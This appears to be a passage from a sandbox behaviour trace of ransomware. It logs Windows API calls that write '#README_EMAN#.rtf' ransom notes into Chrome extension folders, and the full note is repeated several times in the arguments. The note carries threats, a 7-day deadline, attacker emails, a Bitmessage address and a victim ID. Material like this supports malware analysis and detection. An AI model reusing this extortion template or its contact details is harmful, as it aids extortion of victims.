INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.587] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.588] CloseHandle (hObject=0x2f0) returned 1 [0286.588] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\#readme_eman#.rtf")) returned 0x20 [0286.588] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\#readme_eman#.rtf")) returned 0xffffffff [0286.588] GetLastError () returned 0x2 [0286.588] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 